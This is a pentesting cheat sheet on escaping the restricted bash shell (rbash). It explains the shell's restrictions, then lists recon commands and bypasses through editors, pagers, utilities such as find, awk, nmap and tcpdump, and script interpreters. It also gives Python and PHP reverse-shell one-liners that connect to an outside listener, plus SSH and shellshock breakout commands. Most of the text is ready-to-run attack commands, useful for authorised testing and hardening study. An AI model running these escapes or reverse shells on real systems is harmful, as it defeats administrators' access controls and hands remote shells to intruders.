Restrictions
- commands
- environment variables
- capabilities
rbash
rbash, or the restricted Bash shell, is a mode of operation of the regular GNU bash (Bourne Again SHell) with several limitations designed to prevent users from bypassing restrictions to their environment that a system administrator has set. When a user is placed in a restricted shell, it limits their ability to perform potentially harmful or undesired actions. Here are some of the key restrictions imposed by rbash:
- Changing directories with
cd: Users are not able to change the current directory with thecdcommand. This prevents them from navigating the filesystem freely. - Setting or unsetting the values of
SHELL,PATH,ENV, orBASH_ENV: Restricting these environment variables prevents users from altering the execution environment in ways that could bypass restrictions. - Specifying command names containing slashes: Users cannot execute commands that contain slashes, which prevents them from specifying exact paths to commands that might not otherwise be in the
PATH. - Specifying a filename containing a slash as an argument to the
.builtin command: This restriction prevents users from sourcing scripts or configuration files from arbitrary locations. - Specifying a filename containing a slash as an argument to the
poption to thehashbuiltin command: This stops users from hashing a pathname directly. - Importing function definitions from the shell environment at startup: This restriction prevents potentially harmful functions from being automatically imported into the shell environment.
- Parsing the value of
SHELLOPTSfrom the shell environment at startup: By ignoringSHELLOPTS,rbashensures that users cannot enable shell options that could be used to bypass restrictions. - Redirecting output using the
>,>|,<>,>&,&>, and>>redirection operators: This restriction prevents users from overwriting files. - Using the
execbuiltin command to replace the shell with another command: This would normally allow a user to start a new, unrestricted shell. - Adding or deleting builtin commands with the
fanddoptions to theenablebuiltin command: This prevents alterations to the set of commands available to the user. - Using the
enablebuiltin command to enable disabled shell builtins: This restriction keeps the restricted mode intact by not allowing the user to enable features that have been disabled. - Specifying the
poption to thecommandbuiltin command: This option would normally bypass thePATHand allow direct execution of a command by file path. - Turning off restricted mode with
set +rorset +o restricted: This ensures that once in restricted mode, the shell cannot be reverted to an unrestricted state.
Recon
# environment
echo $SHELL
echo $PATH
echo $0
# environment variables
export -p
# list binaries
echo /bin/*
echo /usr/bin/*
echo /usr/local/bin/*
echo /usr/local/rbin/*
Bypass
Text Editor
- vi, vim
# (1)
:set shell=/bin/bash
:shell
# (2)
:!/bin/bash
- emacs
M-x shell
- nano, pico
# .nanorc
bind ^T execute command "/bin/bash"
- ed
ed
!'/bin/bash'
Pager
- less
!/bin/bash
- more
TERM= more /etc/profile
!/bin/sh
- man
!/bin/sh
- git
git help config
!/bin/sh
- apt
apt changelog apt
!/bin/sh
Programs
- find
find / -name foo -exec /bin/sh \;
- awk
awk 'BEGIN {system("/bin/sh")}'
- tee
echo 'bash -i' | tee script.sh
./script.sh
- nmap
nmap --interactive
nmap> !sh
- tcpdump
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
- expect
expect
expect> spawn sh
expect> sh
Programming Language
- python
python3 -c 'import os;os.system("/bin/bash");'
python3 -c 'import os;os.setuid(0);os.system("/bin/bash");'
- perl
perl -e 'system("/bin/bash")'
- php
# (1)
php -r 'exec("sh -i");'
# (2)
echo '<?php exec("sh -i"); ?>' > script.php
php script.php
- ruby
ruby -e 'exec "/bin/sh"'
- lua
lua -e 'os.execute("/bin/sh")'
Reverse Shell
- python
python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect(("10.10.14.39",1234));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
- php
php -r '$sock=fsockopen("LISTENING IP",LISTENING PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
From Outside
- ssh
ssh user@$IP -t "/bin/bash"
ssh user@$IP -t "/bin/bash --noprofile"
- shellshock
ssh user@$IP -t "(){:;}; /bin/bash"